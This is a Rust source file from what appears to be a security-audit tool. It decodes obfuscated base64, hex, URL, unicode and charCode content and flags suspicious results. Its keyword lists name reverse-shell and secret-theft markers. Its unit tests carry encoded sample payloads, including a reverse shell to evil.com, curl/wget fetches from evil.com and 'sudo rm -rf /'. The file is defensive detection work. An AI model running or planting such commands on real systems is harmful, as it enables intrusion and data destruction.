Skip to main content

cc_audit/
deobfuscation.rs

1use base64::Engine;
2use rayon::prelude::*;
3use regex::Regex;
4use std::sync::LazyLock;
5
/// Deobfuscation engine for deep scanning.
///
/// A field-less unit struct: the decoders only read the content handed to them
/// and the module-level regex statics.
pub struct Deobfuscator;
8
/// Candidate Base64 runs: 16 or more characters from the standard and URL-safe
/// alphabets, optionally followed by up to two `=` padding characters.
static BASE64_PATTERN: LazyLock<Regex> = LazyLock::new(|| {
    // Match both the standard (`+`/`/`) and URL-safe (`-`/`_`) alphabets, with or
    // without `=` padding. A single run may be standard OR URL-safe; `decode_base64`
    // tries every engine variant, so an over-broad match is harmless (it just fails
    // to decode). Length >= 16 keeps the original minimum; the `< 20` guard in
    // `decode_base64` still filters short candidates.
    Regex::new(r"[A-Za-z0-9+/_-]{16,}={0,2}").expect("BASE64 regex")
});
/// Runs of four or more `\xHH` escapes, or four or more back-to-back `0xHH`
/// literals. A single match never mixes the two notations.
static HEX_PATTERN: LazyLock<Regex> = LazyLock::new(|| {
    Regex::new(r"(?:\\x[0-9A-Fa-f]{2}){4,}|(?:0x[0-9A-Fa-f]{2}){4,}").expect("HEX regex")
});
/// Runs of four or more consecutive percent-encoded bytes (`%HH`).
static URL_ENCODED_PATTERN: LazyLock<Regex> =
    LazyLock::new(|| Regex::new(r"(?:%[0-9A-Fa-f]{2}){4,}").expect("URL encoded regex"));
/// Runs of two or more consecutive `\uXXXX` escapes.
static UNICODE_ESCAPE_PATTERN: LazyLock<Regex> =
    LazyLock::new(|| Regex::new(r"(?:\\u[0-9A-Fa-f]{4}){2,}").expect("Unicode escape regex"));
/// A `String.fromCharCode(...)` call whose argument list consists only of
/// digits, commas and whitespace.
static CHAR_CODE_PATTERN: LazyLock<Regex> =
    LazyLock::new(|| Regex::new(r"String\.fromCharCode\s*\([\d,\s]+\)").expect("CharCode regex"));
26
27impl Deobfuscator {
28    pub fn new() -> Self {
29        Self
30    }
31
32    /// Deobfuscate content and return a list of decoded strings
33    pub fn deobfuscate(&self, content: &str) -> Vec<DecodedContent> {
34        // Early return if no encoded patterns detected
35        if !self.has_encoded_patterns(content) {
36            return Vec::new();
37        }
38
39        // Parallel decode operations using Rayon
40        // Use a Vec of decoder functions that return Vec<DecodedContent>
41        vec![
42            self.decode_base64(content),
43            self.decode_hex(content),
44            self.decode_url(content),
45            self.decode_unicode_escapes(content),
46            self.decode_char_code(content),
47        ]
48        .into_par_iter()
49        .flatten()
50        .collect()
51    }
52
53    /// Check if content contains encoded patterns
54    fn has_encoded_patterns(&self, content: &str) -> bool {
55        // Use regex patterns for more accurate detection
56        BASE64_PATTERN.is_match(content)
57            || HEX_PATTERN.is_match(content)
58            || URL_ENCODED_PATTERN.is_match(content)
59            || UNICODE_ESCAPE_PATTERN.is_match(content)
60            || CHAR_CODE_PATTERN.is_match(content)
61    }
62
63    /// Decode base64 encoded strings
64    fn decode_base64(&self, content: &str) -> Vec<DecodedContent> {
65        let mut results = Vec::new();
66
67        for cap in BASE64_PATTERN.find_iter(content) {
68            let encoded = cap.as_str();
69            // Skip if too short or looks like random text
70            if encoded.len() < 20 {
71                continue;
72            }
73
74            if let Some(decoded_str) = Self::try_decode_base64_variants(encoded)
75                && self.is_suspicious(&decoded_str)
76            {
77                results.push(DecodedContent {
78                    original: encoded.to_string(),
79                    decoded: decoded_str,
80                    encoding: "base64".to_string(),
81                });
82            }
83        }
84
85        results
86    }
87
88    /// Try decoding a Base64 candidate with every common engine variant and
89    /// return the first result that is valid UTF-8.
90    ///
91    /// Covers standard and URL-safe alphabets, padded and unpadded. The `base64`
92    /// crate rejects the "wrong" alphabet and mismatched padding, so a payload
93    /// using URL-safe or unpadded Base64 (both ubiquitous) would otherwise be
94    /// silently dropped even though the standard-padded form is decoded.
95    fn try_decode_base64_variants(encoded: &str) -> Option<String> {
96        use base64::engine::general_purpose::{
97            STANDARD, STANDARD_NO_PAD, URL_SAFE, URL_SAFE_NO_PAD,
98        };
99
100        let engines: [&base64::engine::GeneralPurpose; 4] =
101            [&STANDARD, &STANDARD_NO_PAD, &URL_SAFE, &URL_SAFE_NO_PAD];
102
103        engines
104            .iter()
105            .filter_map(|engine| engine.decode(encoded).ok())
106            .find_map(|bytes| String::from_utf8(bytes).ok())
107    }
108
109    /// Decode hex encoded strings (\\x or 0x format)
110    fn decode_hex(&self, content: &str) -> Vec<DecodedContent> {
111        let mut results = Vec::new();
112
113        for cap in HEX_PATTERN.find_iter(content) {
114            let encoded = cap.as_str();
115
116            // Extract hex bytes
117            let hex_bytes: Vec<u8> = if encoded.starts_with("\\x") {
118                encoded
119                    .split("\\x")
120                    .filter(|s| !s.is_empty())
121                    .filter_map(|s| u8::from_str_radix(&s[..2.min(s.len())], 16).ok())
122                    .collect()
123            } else {
124                // 0x format
125                encoded
126                    .split("0x")
127                    .filter(|s| !s.is_empty())
128                    .filter_map(|s| u8::from_str_radix(&s[..2.min(s.len())], 16).ok())
129                    .collect()
130            };
131
132            if let Ok(decoded_str) = String::from_utf8(hex_bytes)
133                && self.is_suspicious(&decoded_str)
134            {
135                results.push(DecodedContent {
136                    original: encoded.to_string(),
137                    decoded: decoded_str,
138                    encoding: "hex".to_string(),
139                });
140            }
141        }
142
143        results
144    }
145
146    /// Decode URL encoded strings
147    fn decode_url(&self, content: &str) -> Vec<DecodedContent> {
148        let mut results = Vec::new();
149
150        for cap in URL_ENCODED_PATTERN.find_iter(content) {
151            let encoded = cap.as_str();
152
153            // Manual URL decoding
154            let mut decoded_bytes = Vec::new();
155            let mut chars = encoded.chars().peekable();
156
157            while let Some(c) = chars.next() {
158                if c == '%' {
159                    let hex: String = chars.by_ref().take(2).collect();
160                    if let Ok(byte) = u8::from_str_radix(&hex, 16) {
161                        decoded_bytes.push(byte);
162                    }
163                } else {
164                    decoded_bytes.push(c as u8);
165                }
166            }
167
168            if let Ok(decoded_str) = String::from_utf8(decoded_bytes)
169                && self.is_suspicious(&decoded_str)
170            {
171                results.push(DecodedContent {
172                    original: encoded.to_string(),
173                    decoded: decoded_str,
174                    encoding: "url".to_string(),
175                });
176            }
177        }
178
179        results
180    }
181
182    /// Decode unicode escape sequences (\\uXXXX)
183    fn decode_unicode_escapes(&self, content: &str) -> Vec<DecodedContent> {
184        let mut results = Vec::new();
185
186        for cap in UNICODE_ESCAPE_PATTERN.find_iter(content) {
187            let encoded = cap.as_str();
188            let mut decoded = String::new();
189
190            let mut chars = encoded.chars().peekable();
191            while let Some(c) = chars.next() {
192                if c == '\\' && chars.peek() == Some(&'u') {
193                    chars.next(); // consume 'u'
194                    let hex: String = chars.by_ref().take(4).collect();
195                    if let Ok(code_point) = u32::from_str_radix(&hex, 16)
196                        && let Some(ch) = char::from_u32(code_point)
197                    {
198                        decoded.push(ch);
199                    }
200                } else {
201                    decoded.push(c);
202                }
203            }
204
205            if self.is_suspicious(&decoded) {
206                results.push(DecodedContent {
207                    original: encoded.to_string(),
208                    decoded,
209                    encoding: "unicode".to_string(),
210                });
211            }
212        }
213
214        results
215    }
216
217    /// Decode JavaScript String.fromCharCode patterns
218    fn decode_char_code(&self, content: &str) -> Vec<DecodedContent> {
219        let mut results = Vec::new();
220
221        for cap in CHAR_CODE_PATTERN.find_iter(content) {
222            let encoded = cap.as_str();
223
224            // Extract numbers from the pattern
225            let numbers: Vec<u32> = encoded
226                .split(|c: char| !c.is_ascii_digit())
227                .filter(|s| !s.is_empty())
228                .filter_map(|s| s.parse().ok())
229                .collect();
230
231            let decoded: String = numbers.iter().filter_map(|&n| char::from_u32(n)).collect();
232
233            if self.is_suspicious(&decoded) {
234                results.push(DecodedContent {
235                    original: encoded.to_string(),
236                    decoded,
237                    encoding: "charcode".to_string(),
238                });
239            }
240        }
241
242        results
243    }
244
245    /// Check if decoded content looks suspicious
246    fn is_suspicious(&self, content: &str) -> bool {
247        let suspicious_patterns = [
248            "eval",
249            "exec",
250            "bash",
251            "sh -c",
252            "/bin/",
253            "curl ",
254            "wget ",
255            "nc ",
256            "netcat",
257            "/dev/tcp",
258            "/dev/udp",
259            "base64 -d",
260            "python -c",
261            "ruby -e",
262            "perl -e",
263            "powershell",
264            "cmd.exe",
265            "rm -rf",
266            "chmod ",
267            "sudo ",
268            "password",
269            "secret",
270            "api_key",
271            "token",
272            "credential",
273            "http://",
274            "https://",
275            "ftp://",
276        ];
277
278        let content_lower = content.to_lowercase();
279        suspicious_patterns
280            .iter()
281            .any(|p| content_lower.contains(p))
282    }
283
284    /// Deep scan content - deobfuscate and return all findings
285    pub fn deep_scan(&self, content: &str, file_path: &str) -> Vec<crate::rules::Finding> {
286        use crate::engine::scanner::ScannerConfig;
287
288        let mut findings = Vec::new();
289        let config = ScannerConfig::new();
290
291        // First scan original content
292        findings.extend(config.check_content(content, file_path));
293
294        // Then scan decoded content
295        for decoded in self.deobfuscate(content) {
296            let context = format!("{}:decoded:{}", file_path, decoded.encoding);
297
298            // Create findings for deobfuscated content
299            for mut finding in config.check_content(&decoded.decoded, &context) {
300                // Add note about deobfuscation
301                finding.message = format!(
302                    "{} [Decoded from {} encoded content]",
303                    finding.message, decoded.encoding
304                );
305                findings.push(finding);
306            }
307
308            // Also check for suspicious decoded content itself
309            if decoded.decoded.len() > 10 && self.is_highly_suspicious(&decoded.decoded) {
310                findings.push(crate::rules::Finding {
311                    id: "OB-DEEP-001".to_string(),
312                    severity: crate::rules::Severity::High,
313                    category: crate::rules::Category::Obfuscation,
314                    confidence: crate::rules::Confidence::Firm,
315                    name: "Obfuscated suspicious content".to_string(),
316                    location: crate::rules::Location {
317                        file: file_path.to_string(),
318                        line: 0,
319                        column: None,
320                    },
321                    code: decoded.original.chars().take(100).collect::<String>() + "...",
322                    message: format!(
323                        "Found {} encoded content that decodes to suspicious payload",
324                        decoded.encoding
325                    ),
326                    recommendation: "Review the decoded content for malicious commands or URLs"
327                        .to_string(),
328                    fix_hint: None,
329                    cwe_ids: vec!["CWE-116".to_string()],
330                    rule_severity: None,
331                    client: None,
332                    context: None,
333                });
334            }
335        }
336
337        findings
338    }
339
340    /// Check if content is highly suspicious (more specific than is_suspicious)
341    fn is_highly_suspicious(&self, content: &str) -> bool {
342        let highly_suspicious = [
343            "bash -i",
344            "/dev/tcp/",
345            "nc -e",
346            "rm -rf /",
347            "curl | bash",
348            "wget | sh",
349            "eval(base64",
350            "exec(decode",
351        ];
352
353        let content_lower = content.to_lowercase();
354        highly_suspicious.iter().any(|p| content_lower.contains(p))
355    }
356}
357
358impl Default for Deobfuscator {
359    fn default() -> Self {
360        Self::new()
361    }
362}
363
/// One piece of encoded text found in scanned content, together with what it
/// decodes to.
#[derive(Debug, Clone)]
pub struct DecodedContent {
    /// The encoded text exactly as it was matched in the input.
    pub original: String,
    /// The text obtained by decoding `original`.
    pub decoded: String,
    /// Name of the decoder that produced this entry: `"base64"`, `"hex"`,
    /// `"url"`, `"unicode"` or `"charcode"`.
    pub encoding: String,
}
371
// Unit tests for the individual decoders, the suspicion heuristics and the
// `deobfuscate` / `deep_scan` entry points.
#[cfg(test)]
mod tests {
    use super::*;

    #[test]
    fn test_decode_base64() {
        let deob = Deobfuscator::new();
        // "curl http://evil.com" in base64
        let content = "Y3VybCBodHRwOi8vZXZpbC5jb20=";
        let results = deob.decode_base64(content);
        assert!(!results.is_empty());
        assert!(results[0].decoded.contains("curl"));
    }

    #[test]
    fn test_decode_hex() {
        let deob = Deobfuscator::new();
        // "curl http" as \x escapes
        let content = r"\x63\x75\x72\x6c\x20\x68\x74\x74\x70";
        let results = deob.decode_hex(content);
        assert!(!results.is_empty());
        assert!(results[0].decoded.contains("curl"));
    }

    #[test]
    fn test_decode_url() {
        let deob = Deobfuscator::new();
        // "curl http" URL encoded
        let content = "%63%75%72%6c%20%68%74%74%70";
        let results = deob.decode_url(content);
        assert!(!results.is_empty());
        assert!(results[0].decoded.contains("curl"));
    }

    #[test]
    fn test_decode_charcode() {
        let deob = Deobfuscator::new();
        // String.fromCharCode for "eval"
        let content = "String.fromCharCode(101,118,97,108)";
        let results = deob.decode_char_code(content);
        assert!(!results.is_empty());
        assert!(results[0].decoded.contains("eval"));
    }

    #[test]
    fn test_is_suspicious() {
        let deob = Deobfuscator::new();
        assert!(deob.is_suspicious("curl http://example.com"));
        assert!(deob.is_suspicious("bash -c 'evil command'"));
        assert!(deob.is_suspicious("password=secret123"));
        assert!(!deob.is_suspicious("hello world"));
    }

    #[test]
    fn test_deep_scan() {
        let deob = Deobfuscator::new();
        // Content carrying a highly suspicious obfuscated payload:
        // Base64 for "bash -i >& /dev/tcp/evil.com/1234"
        let content = "normal text\nYmFzaCAtaSA+JiAvZGV2L3RjcC9ldmlsLmNvbS8xMjM0 # hidden payload";
        let findings = deob.deep_scan(content, "test.sh");
        // Accepts either OB-DEEP-001 or any rule finding tagged as decoded
        assert!(
            findings
                .iter()
                .any(|f| f.id == "OB-DEEP-001" || f.message.contains("Decoded"))
        );
    }

    #[test]
    fn test_deobfuscate_empty() {
        let deob = Deobfuscator::new();
        let results = deob.deobfuscate("normal text without obfuscation");
        assert!(results.is_empty());
    }

    #[test]
    fn test_default_trait() {
        // Constructs the unit struct directly (not via `Default`); the
        // `Default` impl itself is covered by `test_deobfuscator_default`.
        let deob = Deobfuscator;
        assert!(!deob.is_suspicious("hello"));
    }

    #[test]
    fn test_decode_unicode_escapes() {
        let deob = Deobfuscator::new();
        // "eval" in unicode escapes
        let content = r"\u0065\u0076\u0061\u006c";
        let results = deob.decode_unicode_escapes(content);
        assert!(!results.is_empty());
        assert!(results[0].decoded.contains("eval"));
    }

    #[test]
    fn test_decode_base64_short_string() {
        let deob = Deobfuscator::new();
        // Short base64 string (less than 20 chars) should be skipped
        let content = "YWJjZA=="; // "abcd" in base64
        let results = deob.decode_base64(content);
        assert!(results.is_empty());
    }

    #[test]
    fn test_decode_base64_non_suspicious() {
        let deob = Deobfuscator::new();
        // Long base64 but decodes to non-suspicious content
        let content = "dGhpcyBpcyBhIG5vcm1hbCBzYWZlIHRleHQ="; // "this is a normal safe text"
        let results = deob.decode_base64(content);
        assert!(results.is_empty());
    }

    #[test]
    fn test_decode_base64_unpadded_standard() {
        let deob = Deobfuscator::new();
        // "curl http://evil.com" in standard base64 with the trailing '='
        // padding stripped. This guards the unpadded engine variants in
        // `try_decode_base64_variants`. Assert full equality, not a substring,
        // so that decoding only an aligned prefix of the payload would fail.
        let content = "Y3VybCBodHRwOi8vZXZpbC5jb20";
        let results = deob.decode_base64(content);
        assert!(
            results.iter().any(|r| r.decoded == "curl http://evil.com"),
            "unpadded standard base64 should decode to the full payload, got: {:?}",
            results.iter().map(|r| &r.decoded).collect::<Vec<_>>()
        );
    }

    #[test]
    fn test_decode_base64_url_safe() {
        let deob = Deobfuscator::new();
        // "wget http://evil.com/xyz??? > /tmp/p" in URL-safe base64 (unpadded).
        // Contains '_', which exists only in the URL-safe alphabet, so this
        // guards both the widened regex character class and the URL-safe engine
        // variants. Assert equality so a decode of just the run before '_'
        // would fail.
        let content = "d2dldCBodHRwOi8vZXZpbC5jb20veHl6Pz8_ID4gL3RtcC9w";
        let results = deob.decode_base64(content);
        assert!(
            results
                .iter()
                .any(|r| r.decoded == "wget http://evil.com/xyz??? > /tmp/p"),
            "URL-safe base64 should decode to the full payload, got: {:?}",
            results.iter().map(|r| &r.decoded).collect::<Vec<_>>()
        );
    }

    #[test]
    fn test_decode_hex_0x_format() {
        let deob = Deobfuscator::new();
        // "curl http" in 0x format
        let content = "0x630x750x720x6c0x200x680x740x740x70";
        let results = deob.decode_hex(content);
        assert!(!results.is_empty());
        assert!(results[0].decoded.contains("curl"));
    }

    #[test]
    fn test_is_highly_suspicious() {
        let deob = Deobfuscator::new();
        assert!(deob.is_highly_suspicious("bash -i >& /dev/tcp/"));
        assert!(deob.is_highly_suspicious("rm -rf /"));
        assert!(deob.is_highly_suspicious("curl | bash something"));
        assert!(deob.is_highly_suspicious("wget | sh something"));
        assert!(deob.is_highly_suspicious("nc -e /bin/bash"));
        assert!(deob.is_highly_suspicious("eval(base64"));
        assert!(deob.is_highly_suspicious("exec(decode"));
        assert!(!deob.is_highly_suspicious("echo hello"));
    }

    #[test]
    fn test_deobfuscate_with_base64() {
        let deob = Deobfuscator::new();
        // Contains suspicious base64
        let content = "command=Y3VybCBodHRwOi8vZXZpbC5jb20="; // "curl http://evil.com"
        let results = deob.deobfuscate(content);
        assert!(!results.is_empty());
    }

    #[test]
    fn test_deobfuscate_multiple_encodings() {
        let deob = Deobfuscator::new();
        // Content with both hex and base64
        let content =
            r"data=Y3VybCBodHRwOi8vZXZpbC5jb20=; exec \x63\x75\x72\x6c\x20\x68\x74\x74\x70";
        let results = deob.deobfuscate(content);
        // Only asserts that at least one decoder produced a result
        assert!(!results.is_empty());
    }

    #[test]
    fn test_deep_scan_clean_content() {
        let deob = Deobfuscator::new();
        let content = "normal clean content without any issues";
        let findings = deob.deep_scan(content, "test.txt");
        // Should have no findings for clean content
        assert!(findings.is_empty());
    }

    #[test]
    fn test_deep_scan_with_suspicious_decoded() {
        let deob = Deobfuscator::new();
        // Content with moderately suspicious base64 (triggers is_suspicious but not is_highly_suspicious)
        let content = "payload=Y3VybCBodHRwOi8vZXhhbXBsZS5jb20vZG93bmxvYWQuc2g="; // "curl http://example.com/download.sh"
        let findings = deob.deep_scan(content, "test.sh");
        // May or may not have findings depending on scanner rules
        // Just verify no panic
        let _ = findings;
    }

    #[test]
    fn test_decoded_content_debug_trait() {
        let content = DecodedContent {
            original: "abc".to_string(),
            decoded: "xyz".to_string(),
            encoding: "base64".to_string(),
        };
        let debug_str = format!("{:?}", content);
        assert!(debug_str.contains("DecodedContent"));
        assert!(debug_str.contains("abc"));
    }

    #[test]
    fn test_decoded_content_clone_trait() {
        let content = DecodedContent {
            original: "abc".to_string(),
            decoded: "xyz".to_string(),
            encoding: "base64".to_string(),
        };
        let cloned = content.clone();
        assert_eq!(content.original, cloned.original);
        assert_eq!(content.decoded, cloned.decoded);
        assert_eq!(content.encoding, cloned.encoding);
    }

    #[test]
    fn test_is_suspicious_various_patterns() {
        let deob = Deobfuscator::new();
        assert!(deob.is_suspicious("wget http://evil.com"));
        assert!(deob.is_suspicious("nc -l 1234"));
        assert!(deob.is_suspicious("netcat connection"));
        assert!(deob.is_suspicious("/dev/tcp/evil"));
        assert!(deob.is_suspicious("/dev/udp/evil"));
        assert!(deob.is_suspicious("base64 -d | bash"));
        assert!(deob.is_suspicious("python -c 'import os'"));
        assert!(deob.is_suspicious("ruby -e 'exec'"));
        assert!(deob.is_suspicious("perl -e 'system'"));
        assert!(deob.is_suspicious("powershell.exe"));
        assert!(deob.is_suspicious("cmd.exe /c"));
        assert!(deob.is_suspicious("rm -rf /tmp"));
        assert!(deob.is_suspicious("chmod 777 file"));
        assert!(deob.is_suspicious("sudo rm"));
        assert!(deob.is_suspicious("api_key=secret"));
        assert!(deob.is_suspicious("token=abc123"));
        assert!(deob.is_suspicious("credential_store"));
        assert!(deob.is_suspicious("ftp://server"));
    }

    #[test]
    fn test_decode_url_non_suspicious() {
        let deob = Deobfuscator::new();
        // URL encoded "hello world" (non-suspicious)
        let content = "%68%65%6c%6c%6f%20%77%6f%72%6c%64";
        let results = deob.decode_url(content);
        // Should be empty because "hello world" is not suspicious
        assert!(results.is_empty());
    }

    #[test]
    fn test_decode_hex_non_suspicious() {
        let deob = Deobfuscator::new();
        // "hello" in hex - not suspicious
        let content = r"\x68\x65\x6c\x6c\x6f";
        let results = deob.decode_hex(content);
        assert!(results.is_empty());
    }

    #[test]
    fn test_decode_charcode_non_suspicious() {
        let deob = Deobfuscator::new();
        // "hello" in charCode - not suspicious
        let content = "String.fromCharCode(104,101,108,108,111)";
        let results = deob.decode_char_code(content);
        assert!(results.is_empty());
    }

    #[test]
    fn test_decode_unicode_non_suspicious() {
        let deob = Deobfuscator::new();
        // "ab" in unicode - not suspicious
        let content = r"\u0061\u0062";
        let results = deob.decode_unicode_escapes(content);
        assert!(results.is_empty());
    }

    #[test]
    fn test_deep_scan_original_content_finding() {
        let deob = Deobfuscator::new();
        // Plain (unencoded) content that is expected to trigger a rule via
        // check_content, e.g. PE-001 for sudo — the rule set is defined outside
        // this module
        let content = "sudo rm -rf /important/files";
        let findings = deob.deep_scan(content, "script.sh");
        // Should find findings for sudo usage
        assert!(!findings.is_empty());
    }

    #[test]
    fn test_deobfuscate_with_url_encoding() {
        let deob = Deobfuscator::new();
        // "curl " percent-encoded, followed by a plain-text URL. Only the
        // encoded run is matched and decoded.
        let content = "command=%63%75%72%6c%20http://evil.com";
        let results = deob.deobfuscate(content);
        // Should find URL-encoded suspicious content
        assert!(results.iter().any(|r| r.encoding == "url"));
    }

    #[test]
    fn test_deobfuscate_with_unicode_escapes() {
        let deob = Deobfuscator::new();
        // Unicode escape encoded "curl http"
        let content = r"var cmd = '\u0063\u0075\u0072\u006c\u0020\u0068\u0074\u0074\u0070'";
        let results = deob.deobfuscate(content);
        // Should find unicode-encoded suspicious content
        assert!(results.iter().any(|r| r.encoding == "unicode"));
    }

    #[test]
    fn test_deobfuscate_with_charcode() {
        let deob = Deobfuscator::new();
        // String.fromCharCode for "curl http"
        let content = "var x = String.fromCharCode(99,117,114,108,32,104,116,116,112)";
        let results = deob.deobfuscate(content);
        // Should find charcode-encoded suspicious content
        assert!(results.iter().any(|r| r.encoding == "charcode"));
    }

    #[test]
    fn test_url_decode_with_only_percent_encoded() {
        let deob = Deobfuscator::new();
        // URL with only percent-encoded characters (matches pattern (?:%[0-9A-Fa-f]{2}){4,})
        // "curl http://" fully percent-encoded
        let content = "%63%75%72%6c%20%68%74%74%70%3a%2f%2f";
        let results = deob.decode_url(content);
        // Should decode correctly
        assert!(!results.is_empty());
        assert!(results[0].decoded.contains("curl"));
        assert!(results[0].decoded.contains("http"));
    }

    #[test]
    fn test_unicode_decode_multiple_escapes() {
        let deob = Deobfuscator::new();
        // Multiple consecutive unicode escapes (matches pattern (?:\\u[0-9A-Fa-f]{4}){2,})
        // "curl http" in unicode escapes
        let content = r"\u0063\u0075\u0072\u006c\u0020\u0068\u0074\u0074\u0070";
        let results = deob.decode_unicode_escapes(content);
        // Should decode correctly
        assert!(!results.is_empty());
        assert!(results[0].decoded.contains("curl"));
    }

    #[test]
    fn test_deobfuscate_all_encodings_combined() {
        let deob = Deobfuscator::new();
        // Content containing URL, unicode, charcode, hex, and base64 encodings
        let content = r#"
            url=%63%75%72%6c%20http
            unicode=\u0065\u0076\u0061\u006c
            charcode=String.fromCharCode(99,117,114,108)
            hex=\x63\x75\x72\x6c\x20\x68\x74\x74\x70
            base64=Y3VybCBodHRwOi8vZXZpbC5jb20=
        "#;
        let results = deob.deobfuscate(content);
        // Only asserts that at least one decoder produced a result
        assert!(!results.is_empty());
    }

    #[test]
    fn test_deep_scan_with_deobfuscated_rule_match() {
        let deob = Deobfuscator::new();
        // Base64 encoded content that contains sudo command
        // "sudo rm -rf /" in base64
        let base64_content = "c3VkbyBybSAtcmYgLw==";
        let content = format!("execute={}", base64_content);
        let findings = deob.deep_scan(&content, "test.sh");
        // Should find findings from both original scan and decoded content
        // The decoded content "sudo rm -rf /" should trigger PE-001
        let has_decoded_finding = findings
            .iter()
            .any(|f| f.message.contains("Decoded") || f.id.contains("OB-DEEP"));
        // Either finds decoded content or the original encoding pattern
        assert!(has_decoded_finding || !findings.is_empty());
    }

    #[test]
    fn test_url_decode_mixed_with_normal_chars() {
        let deob = Deobfuscator::new();
        // URL with mixed encoded and normal characters that decode to suspicious content
        // %63%75%72%6c = "curl", mixed with normal "http"
        let content = "cmd=%63%75%72%6c%20http://evil.com|bash";
        let results = deob.deobfuscate(content);
        // Smoke test only: the result is deliberately not asserted
        let _ = results;
    }

    #[test]
    fn test_unicode_escape_mixed_chars() {
        let deob = Deobfuscator::new();
        // Isolated unicode escapes separated by normal text. The unicode
        // pattern needs two or more consecutive escapes, so these are not
        // expected to form a match.
        let content = r"var x = '\u0063url \u0068ttp://evil.com'";
        let results = deob.deobfuscate(content);
        // Accepts either no results or a unicode result
        assert!(results.is_empty() || results.iter().any(|r| r.encoding == "unicode"));
    }

    #[test]
    fn test_decode_hex_invalid_format() {
        let deob = Deobfuscator::new();
        // Hex with invalid characters that won't parse as hex
        let content = "\\x6Gurl \\x7Gttp"; // 'G' is not valid hex
        let results = deob.deobfuscate(content);
        // Should handle gracefully
        assert!(results.is_empty() || results.iter().all(|r| r.encoding != "hex"));
    }

    #[test]
    fn test_charcode_partial_match() {
        let deob = Deobfuscator::new();
        // String.fromCharCode that decodes to suspicious content (bash execution)
        // 98,97,115,104 = "bash"
        let content = "eval(String.fromCharCode(98,97,115,104))";
        let results = deob.deobfuscate(content);
        // Should decode the charcode to "bash" which is suspicious
        assert!(results.iter().any(|r| r.encoding == "charcode"));
    }

    #[test]
    fn test_deobfuscator_default() {
        // Explicitly test Default::default() implementation
        let deob: Deobfuscator = Default::default();
        assert!(!deob.is_suspicious("normal text"));
        assert!(deob.is_suspicious("curl http://evil.com"));
    }

    #[test]
    fn test_url_decode_mixed_with_plain_chars() {
        let deob = Deobfuscator::new();
        // Despite the name, the input is fully percent-encoded: the pattern
        // requires consecutive %XX sequences, so a mixed string such as
        // "%63url%20%68ttp" would not match at all.
        let content = "%63%75%72%6c%20%68%74%74%70"; // fully encoded "curl http"
        let results = deob.decode_url(content);
        assert!(!results.is_empty());
        assert_eq!(results[0].encoding, "url");
    }

    #[test]
    fn test_decode_url_hello_world_not_suspicious() {
        let deob = Deobfuscator::new();
        // URL encoded but non-suspicious content
        let content = "%68%65%6c%6c%6f%20%77%6f%72%6c%64"; // "hello world"
        let results = deob.decode_url(content);
        // Should not return results since content is not suspicious
        assert!(results.is_empty());
    }
}